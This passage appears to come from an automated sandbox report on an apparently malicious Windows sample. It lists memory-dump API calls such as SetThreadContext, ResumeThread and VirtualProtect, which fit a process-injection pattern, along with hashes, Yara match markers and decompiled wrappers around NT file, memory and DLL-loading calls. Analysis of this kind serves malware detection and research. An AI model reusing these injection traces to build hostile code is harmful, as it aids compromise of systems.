                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00AA2CC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 21f07dc0efa40f2040c274e0920eb0a46810caf4b6ffd9e6490f11209797bf11
                                      • Instruction ID: cfd49f7ac0b279de0b938f212c161313b4fed76bfa78c23d97917f869f687c4e
                                      • Opcode Fuzzy Hash: 21f07dc0efa40f2040c274e0920eb0a46810caf4b6ffd9e6490f11209797bf11
                                      • Instruction Fuzzy Hash: 0B3199B9D042589FCF10CFA9D984ADEFBB4BB09320F14902AE814B7310D775A945CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetThreadContext.KERNELBASE(?,?), ref: 044629DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      • Opcode ID: d47d82a333f1515ffb840e1e89dc46cfe094d980a15ae74f6e79b3448bb48759
                                      • Instruction ID: ea2d7d38d2a6c7a71f74ebd68c706d712221fc1dbd16d0158f39c2b2cac20481
                                      • Opcode Fuzzy Hash: d47d82a333f1515ffb840e1e89dc46cfe094d980a15ae74f6e79b3448bb48759
                                      • Instruction Fuzzy Hash: 2031BBB4D002589FCB10CFA9D884AEEFBF1BB49314F24806AE419B7310D778A945CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetThreadContext.KERNELBASE(?,?), ref: 044629DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      • Opcode ID: ba8f5b87ea546ef9daa8309d2c2ac27b4c542312ef29657c2cf2d8968700d3db
                                      • Instruction ID: b87f2ed62bb183210e39f5c31423369b4b6997a94086a2da313dbaa733b5cff5
                                      • Opcode Fuzzy Hash: ba8f5b87ea546ef9daa8309d2c2ac27b4c542312ef29657c2cf2d8968700d3db
                                      • Instruction Fuzzy Hash: 4B319AB4D012589FCB10CFAAD984ADEFBF0BB49314F14806AE415B7310D778A945CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 0446394B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 61bb4665e73ad1c9d5d31e4b03b1791af47a45852e2342b6db72579156231792
                                      • Instruction ID: 991439a362e0264d65ee3faa27ab970cef81a1e1cf9d15ba8cb0039f8098922b
                                      • Opcode Fuzzy Hash: 61bb4665e73ad1c9d5d31e4b03b1791af47a45852e2342b6db72579156231792
                                      • Instruction Fuzzy Hash: 7631A8B8D012489FCF10CFA9D484ADEFBF4AB09310F14901AE814BB310D335A945CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 0446394B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: eaa77b03a42e77bea067e7abba4934f1f8e0f969141daf71f926e4d013a465ad
                                      • Instruction ID: b6b251d990bfc7f58810f4396c40ae240847b3a0ba474d81e084c178d295a3d6
                                      • Opcode Fuzzy Hash: eaa77b03a42e77bea067e7abba4934f1f8e0f969141daf71f926e4d013a465ad
                                      • Instruction Fuzzy Hash: 263187B8D00248AFCF10CFA9D984ADEFBF4AB49310F14902AE815B7310D335A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OutputDebugStringW.KERNELBASE(?), ref: 00AA3F52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: DebugOutputString
                                      • String ID:
                                      • API String ID: 1166629820-0
                                      • Opcode ID: dd693f99bec965c1f20d4d7409f7ba590a84048e6ed2a1575c2d2216ecac5371
                                      • Instruction ID: 73c19533d43fdcffdea2aa38d17201c176e40424d7862c5bfcd2b9ad137eb85e
                                      • Opcode Fuzzy Hash: dd693f99bec965c1f20d4d7409f7ba590a84048e6ed2a1575c2d2216ecac5371
                                      • Instruction Fuzzy Hash: DF31BAB4D002489FCF14CFAAD984AEEFBF1AB49314F14906AE818B7350D734A946CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OutputDebugStringW.KERNELBASE(?), ref: 00AA3F52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: DebugOutputString
                                      • String ID:
                                      • API String ID: 1166629820-0
                                      • Opcode ID: fa48c1201a8d0be89571343ccda9b8b648775f56490d61919dd1d7d73238e304
                                      • Instruction ID: a9b3abd3fb92cc4afdd66d64382ec8c272457f184fe06dd9cde9f8674fa8c721
                                      • Opcode Fuzzy Hash: fa48c1201a8d0be89571343ccda9b8b648775f56490d61919dd1d7d73238e304
                                      • Instruction Fuzzy Hash: B531B9B4D002489FCF14CFAAD984ADEFBF5AB49314F14802AE818B7350D734A945CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNELBASE(?), ref: 00AADBDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 0cd753afaa0ddb0414c9b824939281639a45df5a1b0dc20838067a790fe73352
                                      • Instruction ID: e4a3839e2a65d43e01d39d32576134dc4b68e2c9d3bd6406ee75d38f5efcf125
                                      • Opcode Fuzzy Hash: 0cd753afaa0ddb0414c9b824939281639a45df5a1b0dc20838067a790fe73352
                                      • Instruction Fuzzy Hash: C231B9B8D002099FCB14CFAAD484ADEFBF5BB49314F14806AE818B7360D374A945CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00AA402E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 88ab24b516c57248636d0f27ba0918eedd77ade0b63ffaa12532e5362e31a1ae
                                      • Instruction ID: 9acad6ae6f0b2a5b2388c23c09d888ccf31445faa5c05a01e36ae0d030c28fce
                                      • Opcode Fuzzy Hash: 88ab24b516c57248636d0f27ba0918eedd77ade0b63ffaa12532e5362e31a1ae
                                      • Instruction Fuzzy Hash: 9E31BBB4D002589FCB10CFA9D484AEEFBF4AB49324F14906AE915B7340C779A946CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 04462F16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: b929fb758a8972652b1c73594a66a023be97681983abb244ad30aa4350e31dc9
                                      • Instruction ID: ea920a755eb1f97d7d9d0769d03f4f20f1e72abd454b087f1c3f52bc5fe656e7
                                      • Opcode Fuzzy Hash: b929fb758a8972652b1c73594a66a023be97681983abb244ad30aa4350e31dc9
                                      • Instruction Fuzzy Hash: 4621A8B8D002089FDB10CFA9D484ADEFBF4BB09324F10906AE819B7300D374A946CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00AA402E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: d762f5b896e3a931f931a34bc8cc68693e16f15b89a7ef8c82922c747f4246af
                                      • Instruction ID: 1670de87d6712bf98a1a8d10f0af2161354bd16a0306e0767b72afb08f17431f
                                      • Opcode Fuzzy Hash: d762f5b896e3a931f931a34bc8cc68693e16f15b89a7ef8c82922c747f4246af
                                      • Instruction Fuzzy Hash: 4D21CCB4D002189FCB10CFA9D484AEEFBF4BB49324F14906AE914B3340D379A945CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 04462F16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 037aee7acd84de0c0e22ec062c85392f8d51987f169f227fd5db1ac7d99c374e
                                      • Instruction ID: 47cff856b6e7ce3e121b32c47a4e24f5e05f69917b2e12fe973fb712b2107f17
                                      • Opcode Fuzzy Hash: 037aee7acd84de0c0e22ec062c85392f8d51987f169f227fd5db1ac7d99c374e
                                      • Instruction Fuzzy Hash: 1D2196B8D002189FCB10CFA9D984ADEFBF4BB49324F14906AE819B7310D774A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: d,d@
                                      • API String ID: 0-3541757951
                                      • Opcode ID: a95963d386c2930c6e3a37f8bd89bb2552da1e24e7d9eaf62c6d98b4391f5a23
                                      • Instruction ID: e4197f8483730768552c0b4fd1316378c5a218dc6205ed99aa4e74fefca45925
                                      • Opcode Fuzzy Hash: a95963d386c2930c6e3a37f8bd89bb2552da1e24e7d9eaf62c6d98b4391f5a23
                                      • Instruction Fuzzy Hash: F1810874E0560ACFCF14CFA5D5854AEFBF2EF89300F14942AD41AB7618E734AA028F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: d,d@
                                      • API String ID: 0-3541757951
                                      • Opcode ID: b7c4edca29b401b40eb6dcc66a473fc6db5a2ebaf8606a96cb2bdb0840c908eb
                                      • Instruction ID: 3e1c356c8b1ed00d086cb7851e5f692d7a0e1f4b1eaf210f5b6b50e2801b5d2d
                                      • Opcode Fuzzy Hash: b7c4edca29b401b40eb6dcc66a473fc6db5a2ebaf8606a96cb2bdb0840c908eb
                                      • Instruction Fuzzy Hash: 38711874E0560ACFCF14CFA5D5855AEFBF2EF89300F10942AD416BB618E734AA028F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: xJ_
                                      • API String ID: 0-1424034576
                                      • Opcode ID: 5ffa7712e2b70400e2bafcacf755ea730b53b9d5f29ba9a85527743f12aa3938
                                      • Instruction ID: 0f1bd0a24927760b66b1d0447794b995bf2a464e099d8a130ef272503c30a6ca
                                      • Opcode Fuzzy Hash: 5ffa7712e2b70400e2bafcacf755ea730b53b9d5f29ba9a85527743f12aa3938
                                      • Instruction Fuzzy Hash: 68414F71E016588BEB28CF6B8D4479EFAF3BFC9301F14C1BA950CA6254DB341A858F51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: xJ_
                                      • API String ID: 0-1424034576
                                      • Opcode ID: 1149b3b59f2fa5e98496a4a3d1f62ffe784a365459588cb5d1b81bc57c7a1311
                                      • Instruction ID: 911e717bbfd0952fd804760c24570146024e5510afafa1c50b1cdc1a5e5caebb
                                      • Opcode Fuzzy Hash: 1149b3b59f2fa5e98496a4a3d1f62ffe784a365459588cb5d1b81bc57c7a1311
                                      • Instruction Fuzzy Hash: 05414EB1E056588BEB28DF6B8D4479AFBF3BFC9300F14C1BA954CA6265DB3409858F11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e58a6ae3aaae281a0dcc8790e84fc91772b2ec78d6a6cf5b33ac8c4e9a4f7d82
                                      • Instruction ID: a41f9eb5b8c257b882ed58343509150a102038fab0276e87e8b93666a513637f
                                      • Opcode Fuzzy Hash: e58a6ae3aaae281a0dcc8790e84fc91772b2ec78d6a6cf5b33ac8c4e9a4f7d82
                                      • Instruction Fuzzy Hash: 1CD199307003049FEB29EB76C5207AFB7E6AF89704F15446ED1469B392DB35E902CB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25613218a1409c1e843ece3281046023cf08987cbd09efa70fd63a34e57d787d
                                      • Instruction ID: c965c0872df73c97074c0b3ae213ec748c9720e84f70921ee078e64fe225f2e4
                                      • Opcode Fuzzy Hash: 25613218a1409c1e843ece3281046023cf08987cbd09efa70fd63a34e57d787d
                                      • Instruction Fuzzy Hash: D4511771E0462ACBDB68CF66C9447A9F7B2FFC8300F04C6EAD509A7614EB705A859F41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ee26cd2b54ce56dab95cd1fc63fc7a112e1b46184794fa569fa2d6a20f1101c
                                      • Instruction ID: a73a9c40d5caf5a51445bb17bb7c1b205161506f3696bc1679956bf28956c182
                                      • Opcode Fuzzy Hash: 6ee26cd2b54ce56dab95cd1fc63fc7a112e1b46184794fa569fa2d6a20f1101c
                                      • Instruction Fuzzy Hash: DA516E70E092598FCB15CF65D89069EBBB2FF89300F14C0ABD449AB262DB345A45CF12
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6db2b29d8ea802ceb512596527eba9d86494a8cd75eec0d65875de363d75fd7b
                                      • Instruction ID: 5407cf5ae50f0823a88747110cbd987628daa7a3409917e2b14776cd66f985ab
                                      • Opcode Fuzzy Hash: 6db2b29d8ea802ceb512596527eba9d86494a8cd75eec0d65875de363d75fd7b
                                      • Instruction Fuzzy Hash: 9D510B71E0161ACBDB68CF66C944799F7B2FFC8300F14C6EAD509A7614EB705A859F40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 162b937702295a35c6fc0f0c35f1d469715bab2e0faec2f559f7c84c07976a87
                                      • Instruction ID: 813171dc7b5632d1a199894c9c0374c14084a7552f55c38ad2dd7ca72fafa6c1
                                      • Opcode Fuzzy Hash: 162b937702295a35c6fc0f0c35f1d469715bab2e0faec2f559f7c84c07976a87
                                      • Instruction Fuzzy Hash: 22410770E052198FDF58CFAAD844A9EFBB2FF88200F14C1AAD409AB354DB349A45CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      C-Code - Quality: 21%
                                      			E00419E0A(void* __eax, void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                      				void* _t22;
                                      				void* _t33;
                                      				void* _t34;
                                      				intOrPtr* _t35;
                                      				void* _t37;
                                      
                                      				asm("xlatb");
                                      				_t17 = _a4;
                                      				_t35 = _a4 + 0xc48;
                                      				E0041A960(_t33, _t17, _t35,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
                                      				_t7 =  &_a32; // 0x414d42
                                      				_t13 =  &_a8; // 0x414d42
                                      				_t22 =  *((intOrPtr*)( *_t35))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, _t34, _t37); // executed
                                      				return _t22;
                                      			}









                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: aea861afaa769c119aca9e2685254c71e41778b70c4eec47ad0bcbfb4e015ca4
                                      • Instruction ID: 29a18177f68743aada76fd6e57ce1dba14aa3a7e21a1c6f6eda7f9655dff5497
                                      • Opcode Fuzzy Hash: aea861afaa769c119aca9e2685254c71e41778b70c4eec47ad0bcbfb4e015ca4
                                      • Instruction Fuzzy Hash: F1F0F9B2210108AFCB18DF99CC80DEB77A9EF8C754F058258BE1DA7241C630E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                      				void* _t18;
                                      				void* _t27;
                                      				intOrPtr* _t28;
                                      
                                      				_t13 = _a4;
                                      				_t28 = _a4 + 0xc48;
                                      				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                      				_t6 =  &_a32; // 0x414d42
                                      				_t12 =  &_a8; // 0x414d42
                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                      				return _t18;
                                      			}







                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00419F3C(void* __ecx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {
                                      
                                      				asm("in eax, 0x53");
                                      				if (__ecx - 1 != 0) goto L3;
                                      			}




                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: adfe3479f324c5e3ebbcb3b25b618ca13a9346657f3e266373f84008338b02bf
                                      • Instruction ID: fdd33ceee7ad2c3648d1ae5bfefc6e1c143736940bcee3c42d57dda199676b0b
                                      • Opcode Fuzzy Hash: adfe3479f324c5e3ebbcb3b25b618ca13a9346657f3e266373f84008338b02bf
                                      • Instruction Fuzzy Hash: 190116B6210209AFCB18DF99DC81EEB73ADEF88714F158519FE0897241C634E861CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040ACD0(intOrPtr* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
                                      				char* _v8;
                                      				struct _EXCEPTION_RECORD _v12;
                                      				struct _OBJDIR_INFORMATION _v16;
                                      				char _v536;
                                      				void* _t15;
                                      				struct _OBJDIR_INFORMATION _t17;
                                      				struct _OBJDIR_INFORMATION _t18;
                                      				void* _t31;
                                      				void* _t32;
                                      				void* _t33;
                                      
                                      				_v8 =  &_v536;
                                      				_t15 = E0041C650( &_v12, 0x104, _a8);
                                      				_t32 = _t31 + 0xc;
                                      				if(_t15 != 0) {
                                      					_t17 = E0041CA70(__ebx, __eflags, _v8);
                                      					_t33 = _t32 + 4;
                                      					__eflags = _t17;
                                      					if(_t17 != 0) {
                                      						E0041CCF0( &_v12, 0);
                                      						_t33 = _t33 + 8;
                                      					}
                                      					_t18 = E0041AEA0(_v8);
                                      					_v16 = _t18;
                                      					__eflags = _t18;
                                      					if(_t18 == 0) {
                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                      						return _v16;
                                      					}
                                      					return _t18;
                                      				} else {
                                      					return _t15;
                                      				}
                                      			}














                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00419D5A(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                      				long _t23;
                                      
                                      				_t34 = __edi -  *0x8b553090;
                                      				_t17 = _a4;
                                      				_t3 = _t17 + 0xc40; // 0xc40
                                      				E0041A960(_t34, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                      				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                      				return _t23;
                                      			}





                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 92bb61d1afa872df51073363e93a6660ee49a63918bacf712a2bddfb23e2c6f2
                                      • Instruction ID: a1f1650daadb6676338ca79c4c2de27240f9a71ece0a713dd86054079629f554
                                      • Opcode Fuzzy Hash: 92bb61d1afa872df51073363e93a6660ee49a63918bacf712a2bddfb23e2c6f2
                                      • Instruction Fuzzy Hash: 7F01A4B2201108AFCB08CF98DC85EEB77A9EF8C754F168248FA0DD7240D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                      				long _t21;
                                      				void* _t31;
                                      
                                      				_t3 = _a4 + 0xc40; // 0xc40
                                      				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                      				return _t21;
                                      			}






                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction ID: cf413ca206411ff2d18a75db46b5d0f02268d6945be3a9f3b5373e53e49f88d9
                                      • Opcode Fuzzy Hash: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction Fuzzy Hash: 58E01AB3304904AB8B04CF98EC95CE773A9EFCC210700850DFA19C7200C531E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00419E8B(void* __eax, void* __ecx, intOrPtr _a4, void* _a8) {
                                      				char _v1;
                                      				long _t10;
                                      				void* _t15;
                                      
                                      				_push( &_v1);
                                      				_t7 = _a4;
                                      				_t2 = _t7 + 0x10; // 0x300
                                      				_t3 = _t7 + 0xc50; // 0x40a923
                                      				E0041A960(_t15, _a4, _t3,  *_t2, 0, 0x2c);
                                      				_t10 = NtClose(_a8); // executed
                                      				return _t10;
                                      			}







                                      APIs
